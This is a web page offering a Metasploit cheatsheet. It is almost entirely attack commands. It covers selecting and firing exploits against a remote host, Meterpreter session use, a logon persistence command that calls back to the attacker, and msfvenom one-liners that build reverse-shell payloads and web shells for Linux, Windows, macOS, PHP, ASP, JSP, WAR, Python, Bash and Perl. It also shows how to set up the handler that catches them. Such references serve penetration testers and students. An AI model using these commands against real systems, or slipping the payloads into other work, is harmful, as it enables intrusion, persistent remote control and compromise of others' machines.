Metasploit - readloud.org

Metasploit cheatsheet

Msfconsole

msfconsole

# Commands to run once the console is running
search code-of-vulnerability 
# example 
# search cve-2010-2075

use id-of-exploit
# remplace id-of-exploit by the id of the result of the search or the path of the module
# example
# use 0
# use exploit/unix/irc/unreal_ircd_3281_backdoor

show payloads

set payload id-of-payload
# replace id-of-payload by the id of the result of show payloads or the path
# example
# set payload 0
# set payload cmd/unix/bind_perl

show options

set OPTION_NAME value
# example
set RHOST 192.168.10.11

show targets
set target 0

exploit

Meterpreter

# List all sessions running on background
msf> sessions

# Start interacting with the session
msf> sessions <session-id>

# Drop into a system command shell
meterpreter> shell
# Upgrade to full functional shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Persistence at the target system
# -h: Help
meterpreter> run persistence -h
# -U: Automatically start when the user logs on
# -i: The interal in seconds between each connection attempt
# -p: The port on which the system running Metesploit is listening
# -r: The IP of the system running Metasploit listening for the connect back
meterpreter> run persistence -U -i 5 -p 443 -r <local-ip>

[+] Creating Metasploit Payloads

List payloads msfvenom -l

Binaries

Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

Python msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z

Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘